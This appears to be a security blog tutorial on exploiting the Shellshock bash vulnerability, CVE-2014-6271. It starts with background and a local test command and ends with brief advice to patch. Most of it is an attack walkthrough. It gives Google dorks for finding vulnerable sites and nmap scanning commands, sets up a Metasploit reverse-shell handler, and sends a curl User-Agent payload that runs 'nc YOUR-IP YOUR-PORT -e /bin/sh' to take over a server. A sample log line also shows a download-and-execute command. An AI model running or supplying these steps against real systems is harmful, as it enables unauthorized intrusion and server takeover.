A recent study from July 2019 shows that the security vulnerability called ShellShock CVE-2014-6271 discovered in 2014 would still be present on a large number of servers in the world although patch have been created since several years. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock”.

Source: cve.mitre.org


ANATOMY OF THE ATTACK

Test your environment

Just run this bash script in your system and you will see if you are vulnerable or not:

env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"

Can I detect if someone has exploited this against me?

We would recommend reviewing your HTTP logs and check if there is anything suspicious. An example of a malicious pattern:

192.168.1.1 – – [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0"  400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"

There are also some patches for bash that log every command that is being passed to the bash interpreter. This is a good way to see if someone has exploited your machine. It won’t prevent someone from exploiting this vulnerability, but it will log the attackers actions on the system.

How serious is the threat?

This bug is very dangerous indeed, but not EVERY system is vulnerable. Special conditions must be met for a web server to be exploited. One of the biggest problems now is that when patches are published, researchers will look for other ways to exploit bash, explore different conditions that enable it to be exploited, etc. So a patch that helps prevent remote code execution can’t do anything against, for example, a file overwrite. So there will probably be a series of patches and in the meantime systems are still vulnerable.


GOOGLE DORK

There is no doubt that there are thousand and one ways to find vulnerable targets for this type of attack. In order to cut short, we are going to use a non-exhaustive list of Google Dork to demonstrate how it's easy for a blackhat to build a list of potential vulnerable websites.

sitemap.xml filetype:xml intext:"cgi-bin"
filetype:sh inurl:cgi-bin
filetype:sh
intext:cgi-bin
intitle:apache "cgi-bin"
inurl:cgi-bin
inurl:wspd_cgi.sh
inurl:wslb.sh
inurl:"server-status" intitle:apache "cgi-bin"
inurl:cgi-bin "GATEWAY_INTERFACE = CGI"
inurl:cgi-bin inurl:printenv intext:SERVER_ADDR

VULNERABILITY ANALYSIS

In order to detect the vulnerability, we can use nmap. To detect this vulnerability the script http-shellshock executes a command that prints a random string and then attempts to find it inside the response body. Web apps that don't print back information won't be detected with this method.

nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>

Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known as Shellshock. It seems the server
|       is executing commands injected via malicious HTTP headers.
|
|     Disclosure date: 2014-09-24
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Once the vulnerability is discovered by the hacker, it can exploit it using Metasploit.


CREATE MSF SESSION

Once a potential flaw has been discovered in an environment, it can easily be exploited as demonstrated below. In order to open a session from our targeted website we will need to create an exploit multi-handler on our Metasploit. This can be done very quickly using the below commands.

# Open Metasploit
msfconsole

msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 0.0.0.0
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > set PAYLOAD linux/x86/shell/reverse_tcp
msf exploit(multi/handler) > show options

Output

Exploit Shellshock Vulnerability CVE-2014-6271 using Metasploit

On the above example we are using a Linux X86 Shell Reverse TCP payload, off course the type of payload shall be different if we are targeting a Windows machine.


EXPLOIT THE TARGET

We are now going to send our exploit in order to create a reverse shell using a bash terminal and forward the traffic through the MSF handler using TCP protocol.

Bash Command

# Replace "YOUR-IP" with your tunnel IP or host adddress
# Replace "YOUR-PORT" with the port you configured
curl -k -H 'User-Agent: () { :;}; /bin/bash -c "nc YOUR-IP YOUR-PORT -e /bin/sh"' http://localhost:8080/cgi-bin/vulnerable

You are done !! If your targeted website is vulnerable to CVE-2014-7169 exploit, a session will be created in your Metasploit allowing you to take over the targeted server.


HOW TO PROTECT YOURSELF FROM SHELLSHOCK VULNERABILITIES

The answer is simple: patch your system. If your system is not yet patched, you have no one to blame but yourself. This vulnerability has been out for years, and pretty much all systems have patches available. To cut short, the best way to protect yourself against this type of vulnerability is to keep your system up to date applying all the fixes released for this exploit.